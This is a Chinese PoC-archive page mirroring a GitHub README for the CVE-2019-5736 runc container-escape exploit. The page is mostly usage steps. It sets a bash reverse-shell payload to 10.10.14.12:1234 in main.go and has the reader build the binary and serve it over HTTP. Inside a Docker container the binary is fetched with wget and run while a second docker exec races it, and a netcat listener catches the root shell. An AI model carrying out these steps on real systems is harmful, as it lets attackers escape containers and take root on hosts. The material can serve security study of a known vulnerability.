POC详情: 7878eb57eaa58f61e29ceb5ecd605baaa11e11f8

来源
https://github.com/h3xcr4ck3r/CVE-2019-5736
关联漏洞
标题: Docker 操作系统命令注入漏洞 (CVE-2019-5736)
描述:Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 Docker 18.09.2之前版本和其他产品中的runc 1.0-rc6及之前版本中存在安全漏洞,该漏洞源于程序没有正确地处理文件描述符。攻击者可利用该漏洞覆盖主机runc的二进制文件并以root权限执行命令。
介绍
🖥️ -k4u5h41-
#️⃣ CVE-2019-5736


## Usage :

machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736).
Download file main.go, change the payload in the file into:

	  var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

After that, run:

	  go build main.go

Host a http server :

	  python3 -m http.server
    
![image](https://user-images.githubusercontent.com/66146701/125002413-5294ba80-e001-11eb-912a-de75e29807bf.png)

Then open 3 Terminals as below : 

![image](https://user-images.githubusercontent.com/66146701/125002553-b4552480-e001-11eb-9ed4-1f78687aa9e9.png)



	Terminal 1
	  sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
      wget http://10.10.14.12/main
      chmod +x main
      ./main
    
	Terminal 2
	  sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
    
	Terminal 3
	  nc -nlvp 1234
    
once you run the ./main in the first ssh terminal immediately run second command in the second ssh terminal, then you will get the netcat reverse shell in the terminal 3

![image](https://user-images.githubusercontent.com/66146701/125002567-bcad5f80-e001-11eb-924d-9e6cf6a50199.png)

![image](https://user-images.githubusercontent.com/66146701/125001720-c2a24100-dfff-11eb-8a08-9a78f1b20474.png)
文件快照

 [4.0K]  /data/pocs/7878eb57eaa58f61e29ceb5ecd605baaa11e11f8
├── [2.1K]  main.go
└── [1.2K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。